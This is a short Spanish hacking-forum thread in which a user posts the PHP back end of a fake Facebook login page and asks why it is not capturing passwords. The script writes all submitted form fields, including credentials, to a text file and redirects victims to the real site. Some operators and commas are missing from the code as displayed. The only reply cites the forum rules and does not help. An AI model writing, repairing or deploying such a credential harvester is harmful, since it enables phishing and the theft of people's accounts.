Hacking basico - consulta sobre pishing, las pass no se guardan

Iniciado por noquiero, 22 Abril 2015, 14:12 PM

0 Miembros y 1 Visitante están viendo este tema.

noquiero

Buenas, intento probar un fake para pishing, de forma manual (no SET).

El action fue editado para redirigir al code.php, el code.php incluye el siguiente codigo:

Código (php) [Seleccionar]

<?php
header 
('Location:https://he-il.facebook.com/');
$handle fopen("passwords.txt""a");
foreach(
$_POST as $variable => $value) {
   
fwrite($handle$variable);
   
fwrite($handle"=");
   
fwrite($handle$value);
   
fwrite($handle"\r\n");
}
fwrite($handle"\r\n");
fclose($handle);
exit;
?>



Aunque tambien intente sin https (con http).
en el server estan el index.html, el code.php y el passwords.txt, ingreso user y pass,me reenvia a la web legitima pero sin guardar el pass.
Alguna idea? . gracias,saludos.

Pablo Videla

Son normas del foro. Hay que respetar sus reglas. Sino, no se puede participar. Debes ser mas prudente y hacer la pregunta de otra forma para llegar a la misma solución.